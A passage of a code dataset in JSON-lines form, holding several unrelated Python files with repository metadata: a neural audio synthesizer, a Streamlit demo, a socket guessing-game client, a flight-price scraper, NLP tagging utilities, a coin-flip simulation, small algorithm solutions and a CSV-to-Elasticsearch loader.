Splitting self.frames into different buffers\n train = self.frames[:10000, :]\n test = self.frames[40000:42500, :]\n validate = self.frames[42500:, :]\n\n # Generating Parameters for the Neural Network and Initializing the Net\n # Number of batches per epoch\n total_batches = int(len(train) / self.topology.batch_size)\n l2 = tf.reduce_sum(tf.get_collection('l2'))\n # loss2 = tf.reduce_mean(tf.pow(y_ - output_, 2)) # MSE error\n\n subt = self.y_ - self.outputLayer\n arg1 = tf.pow(subt, 2)\n arg2 = tf.reduce_mean(tf.pow(self.y_, 2))\n # Spectral Convergence calculation for input and output magnitude STFT\n # frames\n self.loss2 = tf.divide(tf.reduce_mean(arg1), arg2)\n self.loss3 = tf.reduce_mean(arg1)\n self.loss4 = tf.reduce_mean(tf.abs(subt))\n loss_lookup = {'sc': self.loss2, 'mse': self.loss3, 'mae': self.loss4}\n loss = loss_lookup[self._loss_choice] + \\\n self.topology.l2_lamduh * l2 # Imposing L2 penalty\n\n train_step = tf.train.AdamOptimizer(\n self.topology.learning_rate_adam).minimize(loss)\n\n # Loads the trained neural network into memory\n if self._operationMode.new_init:\n self._sess.run(tf.global_variables_initializer())\n else:\n print('Loading')\n self._sess.run(tf.global_variables_initializer())\n ckpt = tf.train.latest_checkpoint(self.topology.chkpt_name)\n self.saver.restore(self._sess, ckpt)\n # Trains the neural net for the number of epochs specified above\n # Prints test accuracy every 10th epoch\n text_file = open(\"metrics.txt\", \"a\")\n for i in range(self.topology.epochs):\n # permuting the training data between epochs improves ADAM's\n # performance\n frames = np.random.permutation(train)\n for _ in range(total_batches):\n # Generates batch of size batch_size for training\n batch = frames[_ *\n self.topology.batch_size:_ *\n self.topology.batch_size +\n self.topology.batch_size]\n self._sess.run(train_step, feed_dict={\n self.x_: batch, self.y_: batch[:, 0:self.topology.output_size]})\n # Reshaping test array to fit with TF\n tes = np.reshape(test[:, :], [-1, self.topology.input_size])\n if i % 3 == 2:\n self.saver.save(\n self._sess,\n self.topology.chkpt_name +\n '/my-model',\n global_step=i)\n temp_value = self._sess.run(self.loss2, feed_dict={\n self.x_: tes, self.y_: test[:, 0:self.topology.output_size]})\n text_file.write('\\n%g' % i)\n text_file.write('\\ntest accuracy %g' % temp_value)\n #print('test accuracy %g'% self._sess.run(self.loss2, feed_dict={self.x_:tes, self.y_:test[:,0:self.topology.output_size]}))\n print('Training Complete \\n Evaluating Model')\n text_file.write('\\n%g' % i)\n val = np.reshape(validate[:, :], [-1, self.topology.input_size])\n temp_value = self._sess.run(self.loss2, feed_dict={\n self.x_: val, self.y_: validate[:, 0:self.topology.output_size]})\n text_file.write('\\nvalidation accuracy %g' % temp_value)\n text_file.close()\n self.plotTrainingFigures()\n\n def plotTrainingFigures(self):\n # Plots 5 examples of the ANN's output given a magnitude STFT frame as input as 5 separate pdfs\n # Dependent on the matplotlib library\n # This is not a good move DON'T KNOW WHY IT'S HERE\n test = np.asarray(self.validate)\n for disp in range(10):\n # X-axis for magnitude response\n x_axis = np.arange(self.topology.output_size)\n # Pulling frames from the 'test' batch for plotting\n orig = np.reshape(test[disp * 20 + 200, :],\n [-1, self.topology.input_size])\n orig_hat = np.reshape(self._sess.run(self.outputLayer, feed_dict={self.x_: orig}), [\n self.topology.output_size, -1]) # Processing frame using ANN\n plt.figure(1)\n plt.subplot(211)\n # Plots the original magnitude STFT frame\n plt.plot(x_axis, np.transpose(\n orig[:, 0:self.topology.output_size]), color='b')\n plt.ylim([0, 1.2])\n plt.subplot(212)\n # Plots the output magnitude STFT frame\n plt.plot(x_axis, orig_hat, color='r')\n plt.tight_layout()\n plt.ylim([0, 1.2])\n plotname = 'HL' + str(self.topology.fc[0]) + '-' + str(\n self.topology.fc[1]) + '-' + str(self.topology.fc[2]) + '-' + str(disp) + '.pdf'\n plt.savefig(plotname, format='pdf', bbox_inches='tight')\n plt.clf()\n print('Plotting Finished')\n\n def execute(self, values, filename='long'):\n self.saver = tf.train.Saver()\n if not self._operationMode.train:\n ckpt = tf.train.latest_checkpoint(self.topology.chkpt_name)\n self.saver.restore(self._sess, ckpt)\n else:\n self.trainNeuralNetwork()\n\n # Prints validation accuracy of the trained ANN\n if self._operationMode.validation:\n print('validation accuracy %g' % self._sess.run(self.loss2, feed_dict={\n self.x_: self.validate, self.y_: self.validate[:, 0:self.topology.output_size]}))\n\n if self._operationMode.control:\n len_window = 4096 # Specified length of analysis window\n hop_length = 1024 # Specified percentage hop length between windows\n t = time()\n n_frames = 750\n mag_buffer = np.zeros((self.topology.output_size, 1))\n activations = values[:, 0:8]\n print(values)\n for ii in range(n_frames):\n orig_hat = np.reshape(\n self._sess.run(\n self.outputLayer2, feed_dict={\n self.controller: activations}), [\n self.topology.output_size, -1])\n mag_buffer = np.hstack((mag_buffer, orig_hat))\n # *np.random.uniform(low=0.999, high=1.001, size=np.shape(mag_buffer))#+np.random.uniform(low=1,high=20,size=np.shape(mag_buffer))\n mag_buffer = 50 * mag_buffer\n bass_boost = (\n np.exp(\n np.linspace(\n 0.95, -0.95, self.topology.output_size)))\n for ii in range(n_frames):\n mag_buffer[:, ii] = np.roll(\n mag_buffer[:, ii], int(values[:, 8])) * bass_boost\n T = do_rtpghi_gaussian_window(\n mag_buffer, len_window, hop_length) # Initializes phase\n T = 0.8 * T / np.max(np.abs(T))\n crossfade_time = 0.35\n crossfade_time = int(crossfade_time * 44100)\n fade_in = np.log(np.linspace(1, 2.71, crossfade_time))\n fade_out = np.log(np.linspace(2.71, 1, crossfade_time))\n T[:crossfade_time] = fade_in * T[:crossfade_time] + \\\n fade_out * T[len(T) - crossfade_time:]\n U = T[:len(T) - crossfade_time]\n # Must be 16bit PCM to work with pygame\n sf.write(filename + '.wav', U, 44100, subtype='PCM_16')\n elapsed = time() - t\n print(\n 'Method took ' +\n str(elapsed) +\n ' seconds to process the whole file')\n print('The whole file is ' + str(len(U) / 44100) + ' seconds long')\n\n def load_weights_into_memory(self):\n self.saver = tf.train.Saver()\n ckpt = tf.train.latest_checkpoint(self.topology.chkpt_name)\n self.saver.restore(self._sess, ckpt)\n\n def play_synth(self, values, n_frames=300, LFO=0, filename='loop.wav'):\n len_window = 4096 # Specified length of analysis window\n hop_length = 1024 # Specified percentage hop length between windows\n mag_buffer = np.zeros((self.topology.output_size, 1))\n activations = values[:, 0:16]\n for ii in range(n_frames):\n orig_hat = np.reshape(\n self._sess.run(\n self.outputLayer2, feed_dict={\n self.controller: activations}), [\n self.topology.output_size, -1])\n mag_buffer = np.hstack((mag_buffer, orig_hat))\n if LFO > 0:\n current_activations = np.zeros((1, 16))\n mag_buffer = np.zeros((self.topology.output_size, 1))\n lfo_freq = LFO\n for ii in range(n_frames):\n current_activations[:, 0:4] = activations[:, 0:4] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq / 20000))\n current_activations[:, 4:8] = activations[:, 4:8] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq * 0.707107 / 20000))\n current_activations[:, 8:12] = activations[:, 8:12] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq * 0.415253 / 20000))\n current_activations[:, 12:] = activations[:, 12:] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq * 0.19258 / 20000))\n orig_hat = np.reshape(\n self._sess.run(\n self.outputLayer2, feed_dict={\n self.controller: current_activations}), [\n self.topology.output_size, -1])\n mag_buffer = np.hstack((mag_buffer, orig_hat))\n\n mag_buffer = 50 * mag_buffer\n bass_boost = np.ones(self.topology.output_size)\n bass_boost[20:29] *= np.linspace(1, 0.3, num=len(bass_boost[20:29]))\n bass_boost[29:40] *= np.linspace(0.3, 0.1, num=len(bass_boost[29:40]))\n bass_boost[40:57] *= np.linspace(0.1, 0.02, num=len(bass_boost[40:57]))\n bass_boost[57:80] *= np.linspace(0.02,\n 0.03, num=len(bass_boost[57:80]))\n bass_boost[80:114] *= np.linspace(0.03,\n 0.1, num=len(bass_boost[80:114]))\n bass_boost[114:160] *= np.linspace(0.1,\n 0.2, num=len(bass_boost[114:160]))\n bass_boost[160:] *= 0.2\n for ii in range(n_frames):\n mag_buffer[:, ii] = np.roll(\n mag_buffer[:, ii], int(values[:, 8])) * bass_boost\n T = do_rtpghi_gaussian_window(\n mag_buffer, len_window, int(hop_length)) # Initializes phase\n T = 0.2 * T / np.max(np.abs(T))\n crossfade_time = 1\n crossfade_time = int(crossfade_time * 44100)\n fade_in = np.log(np.linspace(1, 2.71, crossfade_time))\n fade_out = np.log(np.linspace(2.71, 1, crossfade_time))\n T[:crossfade_time] = fade_in * T[:crossfade_time] + \\\n fade_out * T[len(T) - crossfade_time:]\n U = T[:len(T) - crossfade_time]\n V = np.hstack((U, U, U, U))\n b, a = sci.signal.butter(16, 0.27, 'low', analog=False)\n S = sci.signal.lfilter(b, a, V)\n # Must be 16bit PCM to work with pygame\n sf.write(filename, S, 44100, subtype='PCM_16')\n","repo_name":"eigenfoo/modo-de-ambar","sub_path":"mini_canne/mini_canne.py","file_name":"mini_canne.py","file_ext":"py","file_size_in_byte":19022,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"177799623","text":"import streamlit as st\nimport pandas\n\ndata = {\n 'Series_1': [1,3,4,5,7],\n 'Series_2': [10, 30, 40, 100, 250],\n}\n\n\ndf = pandas.DataFrame(data)\n\n\nst.title('StreamLit')\nst.subheader('Introducing StreamLit Library in Python')\nst.write('''\n\nThis is streamlit.\nA python web framework\n\n''')\nst.write(df)\n\nst.line_chart(df)\nst.area_chart(df)\n\nmyslider = st.slider('Celsius')\nst.write(myslider, 'in Fahrenheit is', myslider * 9/5 + 32)","repo_name":"mhellnerdev/streamlit-py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32408561862","text":"\n# Socket Library\nimport socket\nimport string\n\nprint(\" \")\nprint(\"*******************************************************\")\nprint(\"Welcome! Lets try to guess a number I'm thinking off...\")\nprint(\"*******************************************************\")\nprint(\" \")\n\n#Keep an open loop until the user inputs 'done\" which notifies the client and server to shut down\nDone = False\nwhile not Done:\n\n\t# Set host name and port number\n\thost = 'local host'\n\tport = 5005\n\n\t# TCP / IP protocol\n\t# create a socket\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\t#connect the socket to server and port (127.0.0.1 used to denote localhost)\n\ts.connect(('127.0.0.1', port))\n\n\t#Ask the user to guess a number\n\tmsg = input(\"Enter the number (when finished type done): \")\n\n\t# if the user inputs 'done', shut down the server then shut down the client\n\tif (str(msg).lower() == 'done'):\n\t\tprint(\"Shutting down client, Goodbye!\")\n\t\ts.send(str(msg).encode())\n\t\tDone = True\n\ts.send(str(msg).encode())\n\n\t# receive message string from\n\tmsg = s.recv(1024)\n\n\t# print out the received message\n\twhile msg:\n\t\tprint('Received from Server: ' + msg.decode())\n\t\tmsg = s.recv(1024)\n\n# disconnect the socket\n\ts.close()\n","repo_name":"tlandsb/Artificial_Intelligence","sub_path":"AgentClient.py","file_name":"AgentClient.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19970163197","text":"from sys import stdin\r\r\ninput=stdin.readline\r\r\nfor _ in range(int(input())):\r\r\n\tn, k=list(map(int, input().split()))\r\r\n\ta=list(map(int, input().split()))\r\r\n\tb=[[]]\r\r\n\tb.clear()\r\r\n\tfor i in range(len(a)):\r\r\n\t\tb.append([a[i], i])\r\r\n\tb.sort()\r\r\n\tc=[-1 for i in range(len(a))]\r\r\n\tmp={};\r\r\n\tbaki=n\r\r\n\tfor i in range(n):\r\r\n\t\tif b[i][0] in mp.keys():\r\r\n\t\t\tmp[b[i][0]]+=1\r\r\n\t\telse:\r\r\n\t\t\tmp[b[i][0]]=1\r\r\n\t\tif(mp[b[i][0]]>k):\r\r\n\t\t\tc[b[i][1]]=0\r\r\n\t\t\tbaki-=1\r\r\n\tkoyta=baki//k\r\r\n\tct=1\r\r\n\tfor i in range(n):\r\r\n\t\tif c[b[i][1]]!=-1:\r\r\n\t\t\tcontinue\r\r\n\t\tc[b[i][1]]=ct\r\r\n\t\tct+=1\r\r\n\t\tif(ct>k):\r\r\n\t\t\tct=1\r\r\n\t\t\tkoyta-=1\r\r\n\t\tif koyta<=0:\r\r\n\t\t\tbreak\r\r\n\tfor i in c:\r\r\n\t\tif i==-1:\r\r\n\t\t\tprint(0)\r\r\n\t\telse:\r\r\n\t\t\tprint(i)","repo_name":"tanvirtareq/codeforces","sub_path":"1551B2.py","file_name":"1551B2.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25264981661","text":"import codecs, json, sys\n\nread_file = \"../data/busan.json\"\noutput_file1 = \"../load/busan_1.json\"\noutput_file2 = \"../load/busan_2.json\"\ndata = []\n\nwith codecs.open(read_file, 'rU', 'utf-8') as f:\n\tindex = 1\n\tcount = 1\n\n\tfor line in f:\n\t\tstrr = json.loads(line)\n\t\tstrr = str(strr)\n\t\tdata.append(strr)\n\t\tsp = strr.split(',')\n\t\tetc = \"\" #hum or temp\n\t\tetc_name = \"\"\n\t\ttime = \"\"\n\n\t\tfor i in range(len(sp)):\n\t\t\tsp[i] = str(sp[i])\n\t\t\tif \"LAT\" in sp[i]:\n\t\t\t\tLAT = sp[i].split(':')[1]\n\t\t\telif \"LNG\" in sp[i]:\n\t\t\t\tLNG = sp[i].split(':')[1]\n\t\t\telif \"HUM\" in sp[i] and count%2 ==0:\n\t\t\t\tetc = sp[i].split(':')[1]\n\t\t\t\tetc_name = \"HUM\"\n\t\t\telif \"TEMP\" in sp[i] and count%2 != 0:\n\t\t\t\tetc = sp[i].split(':')[1]\n\t\t\t\tetc_name = \"TEMP\"\n\t\t\telif \"time\" in sp[i]:\n\t\t\t\ttime = sp[i].split(':')[1] + \":\" + sp[i].split(':')[2] + \":\" + sp[i].split(':')[3]\n\n\t\tlocation = \"{ location : [\" + LNG + \",\" + LAT + \" ], time: \"+ time +\", values:{\" + etc_name + \":\" + etc + \"}}\"\n\t\tlocation = location.replace(\"'\", \"\\\"\")\n\t\tcount = count +1\n\t\t#print(location)\n\n\t\tif count % 2 == 0:\n\t\t\tfile_name = output_file1\n\t\telse:\n\t\t\tfile_name = output_file2\n\n\t\twith open(file_name, 'a+') as file:\n\t\t\tfile.write(location+'\\n')","repo_name":"minkky/2018-KISTI","sub_path":"2018-KISTI(BaseLine)/public/python/createTest.py","file_name":"createTest.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2979254336","text":"from concurrent.futures import ThreadPoolExecutor\nimport random\nimport statistics\nimport matplotlib.pyplot as plt\nimport settings\n\n\ndef step(amount):\n coin = random.choice(['h', 't'])\n if coin == 'h':\n return amount * 1.5\n else:\n return amount * 0.6\n\ndef game(number_steps, initial_amount):\n current_amount = initial_amount\n step_results = []\n for i in range(0, number_steps):\n current_amount = step(current_amount)\n step_results.append(current_amount)\n return step_results\n\n\ndef simulation(number_players, initial_amount, number_steps):\n results = []\n with ThreadPoolExecutor(max_workers = 100) as executor:\n for p in range(0, number_players):\n future = executor.submit(game, number_steps, initial_amount)\n results.append(future.result())\n\n list_averages = []\n for i in range(0, number_steps):\n list_averages.append(statistics.mean([pr[i] for pr in results]))\n fig = plt.figure(\"Average\")\n plt.plot(list_averages)\n fig.savefig(f'output/result_{number_players}.png')\n \n\nsimulation(\n settings.NUMBER_OF_PLAYERS,\n settings.INITIAL_AMOUNT,\n settings.NUMBER_OF_STEPS\n)\n","repo_name":"brunotoshio/ergodicity-simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20421122939","text":"from pytrips.tools import nlp\nfrom util_codes import simple_tagger as st\n\n#util functions\ndef ngrams(tokens, n):\n\t'''\n\treturn all n-grams of given tokens as a list of tuples\n\t'''\n\treturn [i for i in zip(*[tokens[i:] for i in range(n)])]\n\ndef sub_grams(n_gram):\n\t'''\n\tgiven an n-gram, return all the sub n-1 grams as a list of tuples, if size is 1, than return empty\n\t'''\n\tif len(n_gram) == 1:\n\t\treturn list()\n\t\n\tresult = list()\n\tfor i in range(len(n_gram)):\n\t\tlst = list(n_gram)\n\t\tlst.pop(i)\n\t\tresult.append(tuple(lst))\n\treturn result\n\n\ndef sort(tu):\n\tlst = list(tu) \n\tn = len(lst) \n\tfor i in range(n): \n\t\tfor j in range(0, n-i-1): \n\t\t\tif lst[j] > lst[j+1]: \n\t\t\t\tlst[j], lst[j+1] = lst[j+1], lst[j] \n\treturn tuple(lst)\n\ndef gram_id(n_gram):\n\t'''\n\tassume n_gram is alrealy a tuple of integers\n\t'''\n\treturn str('.'.join([str(i) for i in n_gram]))\n\ndef pre_process_sent(sent):\n\t\n\ttoken_to_a_set = tag_a_sentence(sent)\n\twords = ['_START_']\n\tdic = {'_START_':'_START_'} #potential problem: is it possible that one word has different tags?\n\tdoc = nlp(sent)\n\n\ti = 0\n\n\twhile i < len(doc):\n\t\t\n\t\ttoken = doc[i]\n\n\t\ttoken_str = str(token)\n\n\t\tif str(token) == '':\n\t\t\ti += 1\n\t\t\tcontinue\n\t\tif token.ent_type_ != '':\n\t\t\ttag = token.ent_type_\n\t\t\tent = []\n\t\t\twhile i < len(doc) and doc[i].ent_type_ != '' and doc[i].ent_type_ == tag:\n\t\t\t\tent.append(str(doc[i]))\n\t\t\t\ti += 1\n\t\t\tent_name = ' '.join(ent)\n\t\t\twords.append(ent_name)\n\t\t\tdic[ent_name] = \"_{}_\".format(tag)\n\t\t\tcontinue\n\n\t\telif token.like_num:\n\t\t\twords.append(token_str)\n\t\t\tdic[token_str] = \"_NUMBER_\"\n\t\t\t\t\n\n\t\telif token.is_punct:\n\t\t\ti += 1\n\t\t\tcontinue\n\t\t\t#words.append(str(token))\n\t\t\t\n\t\t\t#dic[str(token)] = \"_PUNCT_\"\n\t\telif '*' in token_str or '=' in token_str or '#' in token_str:\n\t\t\ti += 1\n\t\t\tcontinue\t\t\n\n\n\t\telif token.is_stop:\n\t\t\twords.append(str(token))\n\t\t\tdic[str(token)] = '_STOP_'\n\n\t\telse:\n\t\t\tif str(token) in token_to_a_set and len(token_to_a_set[str(token)]) != 0:\n\t\t\t\twords.append(str(token))\n\t\t\t\tdic[str(token)] = frozenset(token_to_a_set[str(token)])\n\t\t\telse:\n\t\t\t\twords.append(str(token))\n\t\t\t\tdic[str(token)] = 'POS::' + token.pos_ \n\t\ti += 1\n\n\twords.append('_END_')\n\tdic['_END_'] = '_END_'\n\ttaggings = [dic[word] for word in words]\n\n\treturn words, taggings, dic\n\ndef tag_a_sentence(sentence):\n\twords_with_ontologies = {}\n\ttagging = st.tag_sentence(sentence)\n\t\n\tfor j, i in tagging:\n\t\tif str(i) not in words_with_ontologies:\n\t\t\tj = frozenset([str(s) for s in j])\n\n\t\t\twords_with_ontologies[str(i)] = j\n\treturn words_with_ontologies\n\n\n\n\n","repo_name":"ZhendongLiu/Lab-project","sub_path":"util_codes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38821629399","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\n\n\ndef get_ticket_info(dstation, astation, date, driver):\n url = \"http://flights.ctrip.com/booking/%s-%s-day-1.html?DDate1=%s\" % (dstation, astation, date)\n t1 = time.time()\n driver.get(url)\n t2 = time.time()\n print(\"get url:\", t2-t1)\n # time.sleep(5)\n\n initial_pagesource = driver.page_source\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n # time.sleep(0.1)\n if initial_pagesource == driver.page_source:\n break\n initial_pagesource = driver.page_source\n# with open(\"xiaohuang.txt\", \"w\") as f:\n# f.write(driver.page_source)\n t1 = time.time()\n # soup = BeautifulSoup(driver.page_source)\n soup = BeautifulSoup(initial_pagesource, \"lxml\")\n t3 = time.time()\n print(\"bs4:\", t3-t1)\n result = soup.find_all(\"div\", class_=[\"search_box\", \"search_box_tag\", \"search_box_light\"])\n# print(len(result))\n# print(type(result[0]))\n result_list = []\n for ticket_info in result:\n # print(ticket_info.string)\n try:\n airplane_name = \"<\" + ticket_info.find_all('div', class_=[\"clearfix\", \"J_flight_no\"])[0].text + \">\"\n d_info_div = ticket_info.find_all('td', class_=[\"right\"])[0].find_all('div')\n airplane_dtime = \"<\" + d_info_div[0].text + \">\"\n airplane_dstation = d_info_div[1].text\n a_info_div = ticket_info.find_all('td', class_=[\"left\"])[0].find_all('div')\n airplane_atime = \"<\" + a_info_div[0].text + \">\"\n airplane_astation = a_info_div[1].text\n airplane_price = int(''.join(list(filter(str.isdigit, ticket_info.find_all('span', class_=[\"base_price02\"])[0].text))))\n\n result_list.append([airplane_name, airplane_dstation, airplane_astation, airplane_dtime, airplane_atime, airplane_price])\n except:\n pass\n t2 = time.time()\n print(\"parse the html:\", t2-t1)\n return sorted(result_list, key=lambda x: x[-1])\n\nif __name__ == \"__main__\":\n driver = webdriver.PhantomJS(executable_path=\"./phantomjs\", service_args=['--load-images=no'])\n result_list = get_ticket_info('CTU', 'SHA', '2018-02-27', driver)\n print(result_list)\n # t = SpiderThread('CTU', 'SHA', '2018-02-27')\n # t.start()\n # time.sleep(100)\n # print(t.get_result())","repo_name":"echobear313/surprise","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3296784576","text":"import os, sys \nfrom shutil import copy \nfrom PIL import Image\nfrom tqdm.auto import tqdm \n\n\nCUR_DIR = os.getcwd()\nBASE_DIR = CUR_DIR\nDATA_DIR = os.path.join(BASE_DIR, 'aug_dataset')\n\nfinal_data_dir = os.path.join(BASE_DIR, 'final_dataset')\n\ntrain_img_dir = os.path.join(DATA_DIR, 'images', 'train')\ntrain_lb_dir = os.path.join(DATA_DIR, 'labels', 'train')\n\nfinal_train_img_dir = os.path.join(final_data_dir, 'images', 'train')\nfinal_train_lb_dir = os.path.join(final_data_dir, 'labels', 'train')\n\n\nfiles = os.listdir(train_img_dir)\n\nprint(len(files))\n\ndef read_label(path):\n def handle_number(label):\n\n try:\n l, x, y, w, h = label[0], label[1], label[2], label[3], label[4]\n except:\n print(label)\n return None\n return [int(l), float(x), float(y), float(w), float(h)]\n with open(path, 'r') as fp:\n content = fp.read().strip('\\n')\n if len(content) == 0:\n return None\n ls = content.split('\\n')\n for item in ls:\n check = handle_number(item.split(' '))\n if check == None:\n print(ls)\n print(path)\n labels = [handle_number(item.split(' ')) for item in ls]\n return labels\n\ndef count_label(label):\n count = [0,0,0]\n for l in label:\n count[l[0]]+=1\n return count \n\ndef add(total, label):\n for i, item in enumerate(label):\n total[i] += item\n return total\n\ndef check_label(label, value=2):\n for l in label:\n if l[0] ==2:\n return True \n\n return False\n\ncnt = 0\ncount = [0, 0, 0]\nfor f in files:\n name, ext = os.path.splitext(f)\n lb_file = f'{name}.txt'\n\n img_path = os.path.join(train_img_dir, f)\n lb_path = os.path.join(train_lb_dir, lb_file)\n\n label = read_label(lb_path)\n if label == None:\n os.remove(img_path)\n os.remove(lb_path)\n print(f\"Remove empty {img_path}-{lb_path}\")\n else:\n c = count_label(label)\n count = add(count, c)\n\n check = check_label(label)\n if not check:\n os.remove(img_path)\n os.remove(lb_path)\n print(f\"Remove not incorrectly wearing {img_path}-{lb_path}\")\n else:\n cnt += 1\n\ndef convert_bbox(box, img_width, img_height):\n x_center = box[0]*img_width\n y_center = box[1]*img_height\n box_width = box[2]*img_width\n box_height = box[3]*img_height\n x_min = int(x_center - box_width/2)\n y_min = int(y_center - box_height/2)\n x_max = int(x_min + box_width)\n y_max = int(y_min + box_height)\n box = [x_min, y_min, x_max, y_max]\n return box\ndef filter_boxes(boxes, labels=None):\n new_boxes = []\n new_labels = []\n for index, box in enumerate(boxes):\n xmin, ymin, xmax, ymax = box[0], box[1], box[2], box[3]\n w = xmax - xmin\n h = ymax - ymin\n if (not (w<15 or h<15) and not (w 1 and c[1]<5:\n # data.append((c[2], img_path, lb_path))\n\n data.append((c[2], img_path, lb_path))\n\ndef sort_by_value(l):\n l.sort(key=lambda x:x[0], reverse=True)\n return l\n\ndata = sort_by_value(data)\n\nfor i in range(10):\n print(data[i])\n\nprint(len(data))\ndata = data[:479]\n\ncount = [0,0,0]\nfor item in data:\n label = read_label(item[-1])\n c = count_label(label)\n count = add(count, c)\nprint(count)\n\n\nfor item in tqdm(data):\n img_file = os.path.basename(item[1])\n label_file = os.path.basename(item[-1])\n tgt_image_path = os.path.join(final_train_img_dir, img_file)\n tgt_label_path = os.path.join(final_train_lb_dir, label_file)\n # print(tgt_image_path, tgt_label_path)\n\n name, _ = os.path.splitext(img_file)\n temp = os.path.join(final_train_img_dir, f'{name}.jpg')\n if not os.path.exists(temp):\n copy(item[1], tgt_image_path)\n copy(item[-1], tgt_label_path)\n\n # os.remove(tgt_image_path)\n # os.remove(tgt_label_path)","repo_name":"hieutt99/facemask-detection-20211","sub_path":"dataset-build/zfilter.py","file_name":"zfilter.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70502423849","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 11 00:46:09 2020\n\n@author: kora\n\"\"\"\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nvals = np.random.normal(10,1,10000)\n\nplt.hist(vals,50)\nplt.show()\n#the 99th percential\nnp.percentile(vals,99)\nnp.percentile(vals,90)\n\n\n#moment\n#first moment is the mean \nnp.mean(vals)\n#second moment is the SD\nnp.std(vals)\n#the thirs moment is skew\nimport scipy.stats as sp \nsp.skew(vals)\n\n#The fourth moment is kurtosis \nsp.kurtosis(vals)\nnp.max(vals)","repo_name":"davidenoma/bioinformaticsscripts","sub_path":"Data Science/percentiles_and_moments.py","file_name":"percentiles_and_moments.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73216231209","text":"'''给你一个整数数组nums ,判断这个数组中是否存在长度为 3 的递增子序列。\n如果存在这样的三元组下标 (i, j, k)且满足 i < j < k ,使得nums[i] < nums[j] < nums[k] ,返回 true ;否则,返回 false 。'''\n'''遍历num,在过程中更新最小值num[i]和num[j],i < j,一旦这样的i和j找到,只要再出现比num[j]更大的num,则返回True'''\n\nfrom typing import List\n\n\nclass Solution:\n def increasingTriplet(self, nums: List[int]) -> bool:\n n = len(nums)\n i, j = nums[0] , 2**31 \n for k in range(n):\n if nums[k] > j :\n return True\n elif nums[k] > i :\n j = nums[k]\n else :\n i = nums[k]\n return False \n \nnums = [2,1,5,0,4,6]\nnums = [1,2,3,4,5]\nnums = [20,100,10,12,5,13]\nprint(Solution().increasingTriplet(nums))","repo_name":"pwl607/LeetCodeSolutions","sub_path":"334. 递增的三元子序列.py","file_name":"334. 递增的三元子序列.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7306595522","text":"#!/usr/bin/python3\nimport csv, os\nfrom pathlib import Path\nfrom urllib.parse import urlparse\nimport configparser\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk, streaming_bulk, parallel_bulk\nimport pprint\ncached_values={}\n\ndef preprocess_item(item, config):\n pass\n\n\ndef recreate_index(config):\n host = config.get('main', 'host')\n port = config.get('main', 'port')\n \n _index = config.get('main', 'index')\n _type = config.get('main', 'type')\n\n index_settings_file = config.get('main', 'index_settings')\n \n es = Elasticsearch([{'host': host, 'port': port}])\n # delete index if exists\n if es.indices.exists(_index):\n es.indices.delete(index=_index)\n # index settings\n settings={}\n es.indices.create(index=_index, body=settings)\n return es\n \ndef getcontent_csv(config):\n \n source_path = config.get('main', 'source_path')\n _index = config.get('main', 'index')\n _type = config.get('main', 'type')\n fieldnames = config.get('csv', 'header', fallback=None)\n #Parse field names if set\n fieldnames=fieldnames.split(',') if fieldnames is not None else None\n # Added support multi-character represented characters, such as tabs.\n delimiter = config.get('csv', 'delimiter')\n delimiter = str.encode(delimiter, 'utf-8')\n delimiter = delimiter.decode('unicode_escape')\n id_field = config.get('main', 'id_field', fallback=False)\n #print(id_field)\n \n\n with open(source_path, encoding='utf-8') as f:\n csvreader = csv.DictReader(f, fieldnames=fieldnames, delimiter=delimiter)\n for item in csvreader:\n #item = preprocess_item(row, config)\n \n action = {\n '_op_type': 'index',\n '_index': _index,\n '_type': _type,\n }\n \n if id_field:\n id = item[id_field]\n action['_id'] = id\n item.pop('_id', None)\n\n action['_source']=item\n #pprint.pprint(action)\n yield action\n\n\ndef push2es_stream(config):\n es = recreate_index(config)\n data = list(getcontent_csv(config))\n report = bulk(es, data)\n print(report)\n \n \ndef push2es_parallel(config):\n es = recreate_index(config)\n #paralell bulk\n for success, info in parallel_bulk(es, getcontent_csv(config), thread_count=4):\n if not success: print('Doc failed', info)\n \n \n \ndef csv2es(parallel=True):\n config = configparser.SafeConfigParser()\n config.read('config.ini')\n if parallel:\n push2es_parallel(config)\n else:\n push2es_stream(config)\n\nif __name__ == '__main__':\n csv2es(parallel=False)\n 